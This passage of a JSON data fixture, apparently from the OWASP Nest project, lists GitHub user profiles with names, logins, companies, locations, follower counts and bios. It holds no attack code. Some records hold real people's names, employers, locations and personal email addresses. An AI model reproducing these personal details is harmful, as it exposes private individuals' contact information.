"nest_updated_at": "2024-09-12T01:26:26.851Z", + "name": "", + "login": "poteddy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95437799?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-12-02T17:38:07Z", + "updated_at": "2022-12-28T18:18:47Z", + "node_id": "U_kgDOBbBD5w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2447, + "fields": { + "nest_created_at": "2024-09-12T01:26:28.911Z", + "nest_updated_at": "2024-09-12T01:26:28.911Z", + "name": "Tim Birkett", + "login": "js-timbirkett", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57101177?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 17, + "public_repositories_count": 37, + "created_at": "2019-10-28T13:59:39Z", + "updated_at": "2022-12-15T11:38:27Z", + "node_id": "MDQ6VXNlcjU3MTAxMTc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2448, + "fields": { + "nest_created_at": "2024-09-12T01:26:30.168Z", + "nest_updated_at": "2024-09-22T18:44:16.863Z", + "name": "sahil gupta", + "login": "sahil3112", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43255158?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-09-13T23:11:13Z", + "updated_at": "2024-08-26T20:55:42Z", + "node_id": "MDQ6VXNlcjQzMjU1MTU4", + "bio": "Application Security | DevSecOps | Secure SDLC | Penetration Tester (Web, API and Thick Client) | CEHv10 | IBM Certified Cybersecurity Analyst Professional", + "is_hireable": false, + "twitter_username": "sahil_3112" + } +}, +{ + "model": "github.user", + "pk": 2449, + "fields": { + "nest_created_at": "2024-09-12T01:26:33.940Z", + "nest_updated_at": "2024-09-12T01:26:33.940Z", + "name": "Richard Carpenter", + "login": "artfulbodger", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7009338?v=4", + "company": "CarpoDiem", + "location": "Devon, UK", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2014-03-20T09:37:51Z", + "updated_at": "2024-08-16T15:00:06Z", + "node_id": "MDQ6VXNlcjcwMDkzMzg=", + "bio": "DevSecOps - PowerShell and PHP Coder", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2450, + "fields": { + "nest_created_at": "2024-09-12T01:26:35.978Z", + "nest_updated_at": "2024-09-12T01:26:35.978Z", + "name": "", + "login": "CBerndt-Work", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93646183?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-11-03T08:59:08Z", + "updated_at": "2024-07-09T20:16:40Z", + "node_id": "U_kgDOBZTtZw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2451, + "fields": { + "nest_created_at": "2024-09-12T01:26:38.537Z", + "nest_updated_at": "2024-09-16T22:28:30.022Z", + "name": "", + "login": "kbolander", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96793624?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-12-28T19:09:58Z", + "updated_at": "2024-09-02T13:27:28Z", + "node_id": "U_kgDOBcT0GA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2452, + "fields": { + "nest_created_at": "2024-09-12T01:26:41.060Z", + "nest_updated_at": "2024-09-12T01:42:24.934Z", + "name": "Erik Weber", + "login": "eriweb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6181934?v=4", + "company": "@Norsk-Tipping ", + "location": "Hamar, Norway", + "collaborators_count": 0, + "following_count": 359, + "followers_count": 50, + "public_gists_count": 17, + "public_repositories_count": 30, + "created_at": "2013-12-13T23:04:58Z", + "updated_at": "2024-08-05T07:36:37Z", + "node_id": "MDQ6VXNlcjYxODE5MzQ=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2453, + "fields": { + "nest_created_at": "2024-09-12T01:26:42.301Z", + "nest_updated_at": "2024-09-12T01:26:42.301Z", + "name": "", + "login": "nedmark", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30747283?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-08-05T09:17:41Z", + "updated_at": "2022-11-30T12:18:37Z", + "node_id": "MDQ6VXNlcjMwNzQ3Mjgz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2454, + "fields": { + "nest_created_at": "2024-09-12T01:26:46.410Z", + "nest_updated_at": "2024-09-12T01:26:46.410Z", + "name": "", + "login": "antgordon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/56523753?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-10-14T00:46:25Z", + "updated_at": "2023-02-06T00:08:52Z", + "node_id": "MDQ6VXNlcjU2NTIzNzUz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2455, + "fields": { + "nest_created_at": "2024-09-12T01:26:47.678Z", + "nest_updated_at": "2024-09-12T01:39:40.478Z", + "name": "Kenny Moens", + "login": "kmoens", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5837260?v=4", + "company": "Cipal Schaubroeck nv / Tieltse Wielervrienden vzw / Hondenclub Sint Bavo vzw", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2013-11-02T10:34:59Z", + "updated_at": "2024-04-16T12:51:48Z", + "node_id": "MDQ6VXNlcjU4MzcyNjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2456, + "fields": { + "nest_created_at": "2024-09-12T01:26:50.181Z", + "nest_updated_at": "2024-09-12T01:26:50.181Z", + "name": "Alex", + "login": "lazyw0lf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7389032?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2014-04-23T21:42:04Z", + "updated_at": "2022-10-13T17:35:53Z", + "node_id": "MDQ6VXNlcjczODkwMzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2457, + "fields": { + "nest_created_at": "2024-09-12T01:26:51.409Z", + "nest_updated_at": "2024-09-12T01:26:51.409Z", + "name": "lightjw", + "login": "lightjw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42208084?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2018-08-08T11:48:19Z", + "updated_at": "2024-09-06T11:48:59Z", + "node_id": "MDQ6VXNlcjQyMjA4MDg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2458, + "fields": { + "nest_created_at": "2024-09-12T01:26:57.614Z", + "nest_updated_at": "2024-09-12T01:26:57.614Z", + "name": "", + "login": "ajeshkc1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37045004?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-03-04T15:43:11Z", + "updated_at": "2024-08-20T11:52:09Z", + "node_id": "MDQ6VXNlcjM3MDQ1MDA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2459, + "fields": { + "nest_created_at": "2024-09-12T01:26:58.851Z", + "nest_updated_at": "2024-09-22T19:49:34.019Z", + "name": "Rikita Ishikawa", + "login": "wonda-tea-coffee", + "email": "lagrange.resolvent@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/39144575?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 39, + "public_gists_count": 3, + "public_repositories_count": 74, + "created_at": "2018-05-10T02:39:45Z", + "updated_at": "2024-08-16T08:58:13Z", + "node_id": "MDQ6VXNlcjM5MTQ0NTc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2460, + "fields": { + "nest_created_at": "2024-09-12T01:27:02.640Z", + "nest_updated_at": "2024-09-12T01:27:02.640Z", + "name": "", + "login": "tfactor2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7229951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 2, + "public_repositories_count": 17, + "created_at": "2014-04-08T19:02:18Z", + "updated_at": "2024-08-19T09:08:08Z", + "node_id": "MDQ6VXNlcjcyMjk5NTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2461, + "fields": { + "nest_created_at": "2024-09-12T01:27:03.870Z", + "nest_updated_at": "2024-09-12T01:27:03.870Z", + "name": "", + "login": "belahouel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27809585?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-04-20T10:20:22Z", + "updated_at": "2023-04-05T13:46:40Z", + "node_id": "MDQ6VXNlcjI3ODA5NTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2462, + "fields": { + "nest_created_at": "2024-09-12T01:27:05.156Z", + "nest_updated_at": "2024-09-12T01:27:05.156Z", + "name": "", + "login": "nyerrabothula", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29912378?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2017-07-05T06:59:40Z", + "updated_at": "2023-10-15T00:45:37Z", + "node_id": "MDQ6VXNlcjI5OTEyMzc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2463, + "fields": { + "nest_created_at": "2024-09-12T01:27:06.427Z", + "nest_updated_at": "2024-09-12T01:27:06.427Z", + "name": "", + "login": "xingheluqi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13388974?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 7, + "created_at": "2015-07-18T02:21:32Z", + "updated_at": "2022-06-09T00:26:53Z", + "node_id": "MDQ6VXNlcjEzMzg4OTc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2464, + "fields": { + "nest_created_at": "2024-09-12T01:27:07.628Z", + "nest_updated_at": "2024-09-12T01:27:07.628Z", + "name": "", + "login": "naga5645", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78976261?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-02-12T17:25:42Z", + "updated_at": "2022-03-15T09:40:11Z", + "node_id": "MDQ6VXNlcjc4OTc2MjYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2465, + "fields": { + "nest_created_at": "2024-09-12T01:27:08.906Z", + "nest_updated_at": "2024-09-18T19:06:57.455Z", + "name": "Roman", + "login": "Kretikus", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1334939?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 5, + "public_repositories_count": 22, + "created_at": "2012-01-16T21:03:45Z", + "updated_at": "2024-09-16T14:01:18Z", + "node_id": "MDQ6VXNlcjEzMzQ5Mzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2466, + "fields": { + "nest_created_at": "2024-09-12T01:27:10.174Z", + "nest_updated_at": "2024-09-12T01:27:10.174Z", + "name": "dsaffie", + "login": "dsaffie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97295218?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-01-07T13:35:38Z", + "updated_at": "2024-08-06T18:19:34Z", + "node_id": "U_kgDOBcybcg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2467, + "fields": { + "nest_created_at": "2024-09-12T01:27:11.465Z", + "nest_updated_at": "2024-09-12T01:27:14.040Z", + "name": "", + "login": "ultramaxim", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/406954?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2010-09-19T11:50:00Z", + "updated_at": "2024-09-03T05:21:59Z", + "node_id": "MDQ6VXNlcjQwNjk1NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2468, + "fields": { + "nest_created_at": "2024-09-12T01:27:17.134Z", + "nest_updated_at": "2024-09-12T01:27:17.134Z", + "name": "Dmitry", + "login": "rybas-dv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33660490?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-11-14T13:47:28Z", + "updated_at": "2024-06-29T08:59:06Z", + "node_id": "MDQ6VXNlcjMzNjYwNDkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2469, + "fields": { + "nest_created_at": "2024-09-12T01:27:18.409Z", + "nest_updated_at": "2024-09-12T01:27:19.670Z", + "name": "", + "login": "croniserb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23509761?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-11-16T20:56:30Z", + "updated_at": "2024-03-04T11:43:12Z", + "node_id": "MDQ6VXNlcjIzNTA5NzYx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2470, + "fields": { + "nest_created_at": "2024-09-12T01:27:25.462Z", + "nest_updated_at": "2024-09-12T01:27:25.462Z", + "name": "Michael Wellendorf", + "login": "software-testing-professional", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/82155716?v=4", + "company": "software testing PROFESSIONAL", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-04-08T12:02:36Z", + "updated_at": "2024-07-24T08:00:57Z", + "node_id": "MDQ6VXNlcjgyMTU1NzE2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2471, + "fields": { + "nest_created_at": "2024-09-12T01:27:29.373Z", + "nest_updated_at": "2024-09-12T01:27:29.373Z", + "name": "Jonas VDB", + "login": "Jonas-vdb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10735898?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-01-28T04:35:41Z", + "updated_at": "2024-08-22T08:14:28Z", + "node_id": "MDQ6VXNlcjEwNzM1ODk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2472, + "fields": { + "nest_created_at": "2024-09-12T01:27:32.451Z", + "nest_updated_at": "2024-09-12T01:27:32.451Z", + "name": "", + "login": "chinmaybhave05", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71174866?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-09-12T10:34:22Z", + "updated_at": "2022-04-18T07:04:48Z", + "node_id": "MDQ6VXNlcjcxMTc0ODY2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2473, + "fields": { + "nest_created_at": "2024-09-12T01:27:39.187Z", + "nest_updated_at": "2024-09-12T01:27:39.187Z", + "name": "", + "login": "ajendrosch2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104896295?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-05-04T09:14:24Z", + "updated_at": "2022-08-03T13:46:47Z", + "node_id": "U_kgDOBkCXJw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2474, + "fields": { + "nest_created_at": "2024-09-12T01:27:40.455Z", + "nest_updated_at": "2024-09-12T01:40:19.319Z", + "name": "", + "login": "elastic-pangolin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104518433?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2022-04-27T16:13:14Z", + "updated_at": "2024-07-03T15:04:13Z", + "node_id": "U_kgDOBjrTIQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2475, + "fields": { + "nest_created_at": "2024-09-12T01:27:43.378Z", + "nest_updated_at": "2024-09-12T01:27:43.378Z", + "name": "mb", + "login": "mrtnbm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49289399?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 61, + "created_at": "2019-04-04T19:23:15Z", + "updated_at": "2024-07-04T17:10:44Z", + "node_id": "MDQ6VXNlcjQ5Mjg5Mzk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2476, + "fields": { + "nest_created_at": "2024-09-12T01:27:46.326Z", + "nest_updated_at": "2024-09-12T01:32:43.122Z", + "name": "", + "login": "andresghelarducci", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44871257?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-11-08T14:11:19Z", + "updated_at": "2024-07-11T08:43:17Z", + "node_id": "MDQ6VXNlcjQ0ODcxMjU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2477, + "fields": { + "nest_created_at": "2024-09-12T01:27:47.942Z", + "nest_updated_at": "2024-09-12T01:27:47.942Z", + "name": "", + "login": "k4n5ha0", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22064977?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 36, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2016-09-08T00:59:23Z", + "updated_at": "2023-05-29T00:43:11Z", + "node_id": "MDQ6VXNlcjIyMDY0OTc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2478, + "fields": { + "nest_created_at": "2024-09-12T01:27:49.197Z", + "nest_updated_at": "2024-09-12T01:27:49.197Z", + "name": "Lukas Adoma", + "login": "lukas-adoma", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53977328?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-08-10T16:33:39Z", + "updated_at": "2024-01-23T01:49:33Z", + "node_id": "MDQ6VXNlcjUzOTc3MzI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2479, + "fields": { + "nest_created_at": "2024-09-12T01:27:50.899Z", + "nest_updated_at": "2024-09-12T01:27:50.899Z", + "name": "Adrián Fuentes", + "login": "fuentecilla86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3702345?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-02-26T07:40:47Z", + "updated_at": "2024-04-15T14:33:15Z", + "node_id": "MDQ6VXNlcjM3MDIzNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2480, + "fields": { + "nest_created_at": "2024-09-12T01:27:53.772Z", + "nest_updated_at": "2024-09-12T01:27:53.772Z", + "name": "Bruno Guimarães", + "login": "brunobastosg", + "email": "brunobastosg@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/320122?v=4", + "company": "SERPRO - Serviço Federal de Processamento de Dados", + "location": "Salvador, BA, Brazil", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2010-07-01T14:18:19Z", + "updated_at": "2024-09-05T19:47:27Z", + "node_id": "MDQ6VXNlcjMyMDEyMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2481, + "fields": { + "nest_created_at": "2024-09-12T01:27:54.985Z", + "nest_updated_at": "2024-09-12T01:37:46.751Z", + "name": "Arnaud Mergey", + "login": "amergey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/956840?v=4", + "company": "Semarchy", + "location": "France", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2011-08-03T15:32:17Z", + "updated_at": "2024-02-16T09:40:16Z", + "node_id": "MDQ6VXNlcjk1Njg0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2482, + "fields": { + "nest_created_at": "2024-09-12T01:27:56.193Z", + "nest_updated_at": "2024-09-12T01:27:56.193Z", + "name": "", + "login": "ecaisse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1854279?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-06-15T15:06:10Z", + "updated_at": "2024-02-06T22:46:31Z", + "node_id": "MDQ6VXNlcjE4NTQyNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2483, + "fields": { + "nest_created_at": "2024-09-12T01:28:01.235Z", + "nest_updated_at": "2024-09-12T01:28:01.235Z", + "name": "Yurryt Vermeire", + "login": "YurrytVermeire", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/78538193?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2021-02-04T10:45:07Z", + "updated_at": "2024-09-01T12:20:44Z", + "node_id": "MDQ6VXNlcjc4NTM4MTkz", + "bio": "Network & Security graduate, \r\nStudent Master in Applied Informatics", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2484, + "fields": { + "nest_created_at": "2024-09-12T01:28:08.964Z", + "nest_updated_at": "2024-09-12T01:28:08.964Z", + "name": "", + "login": "bret99", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64787351?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2020-05-04T13:06:18Z", + "updated_at": "2024-09-06T08:25:49Z", + "node_id": "MDQ6VXNlcjY0Nzg3MzUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2485, + "fields": { + "nest_created_at": "2024-09-12T01:28:10.634Z", + "nest_updated_at": "2024-09-22T19:42:25.576Z", + "name": "", + "login": "bahrb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40354362?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-06-18T09:15:20Z", + "updated_at": "2022-03-03T10:52:23Z", + "node_id": "MDQ6VXNlcjQwMzU0MzYy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2486, + "fields": { + "nest_created_at": "2024-09-12T01:28:11.906Z", + "nest_updated_at": "2024-09-12T01:28:11.906Z", + "name": "Borja Domínguez", + "login": "bdovaz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/950602?v=4", + "company": "Virtualware", + "location": "Bilbao", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2011-07-31T23:30:32Z", + "updated_at": "2024-08-01T06:43:14Z", + "node_id": "MDQ6VXNlcjk1MDYwMg==", + "bio": "Senior Unity Developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2487, + "fields": { + "nest_created_at": "2024-09-12T01:28:13.170Z", + "nest_updated_at": "2024-09-12T01:28:13.170Z", + "name": "Cyril Labbe", + "login": "ryden54", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4123392?v=4", + "company": "@boursorama", + "location": "Nancy", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2013-04-11T07:04:00Z", + "updated_at": "2024-08-15T11:22:47Z", + "node_id": "MDQ6VXNlcjQxMjMzOTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2488, + "fields": { + "nest_created_at": "2024-09-12T01:28:17.470Z", + "nest_updated_at": "2024-09-12T01:28:17.470Z", + "name": "Kai Kretschmann", + "login": "kkretsch", + "email": "kai@kaikretschmann.de", + "avatar_url": "https://avatars.githubusercontent.com/u/1115638?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2011-10-10T07:28:18Z", + "updated_at": "2024-07-21T08:43:39Z", + "node_id": "MDQ6VXNlcjExMTU2Mzg=", + "bio": "Nerdy by nature", + "is_hireable": false, + "twitter_username": "kkretsch" + } +}, +{ + "model": "github.user", + "pk": 2489, + "fields": { + "nest_created_at": "2024-09-12T01:28:20.413Z", + "nest_updated_at": "2024-09-12T01:28:20.413Z", + "name": "Sascha Di Bernardo", + "login": "sdibernardo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23256170?v=4", + "company": "@viadee ", + "location": "Münster", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-11-04T08:43:36Z", + "updated_at": "2024-09-06T08:16:09Z", + "node_id": "MDQ6VXNlcjIzMjU2MTcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2490, + "fields": { + "nest_created_at": "2024-09-12T01:28:28.791Z", + "nest_updated_at": "2024-09-22T19:42:28.737Z", + "name": "Stephan Wolf", + "login": "stephan-wolf-ais", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51930074?v=4", + "company": "Kontron AIS GmbH", + "location": "Dresden, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-17T20:08:04Z", + "updated_at": "2024-09-17T09:49:04Z", + "node_id": "MDQ6VXNlcjUxOTMwMDc0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2491, + "fields": { + "nest_created_at": "2024-09-12T01:28:30.590Z", + "nest_updated_at": "2024-09-12T01:28:53.110Z", + "name": "", + "login": "matamorphosis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26025152?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 79, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-02-25T13:32:17Z", + "updated_at": "2024-06-25T05:26:37Z", + "node_id": "MDQ6VXNlcjI2MDI1MTUy", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2492, + "fields": { + "nest_created_at": "2024-09-12T01:28:31.919Z", + "nest_updated_at": "2024-09-12T01:28:31.919Z", + "name": "", + "login": "IchGehSteil", + "email": "", + "avatar_url": 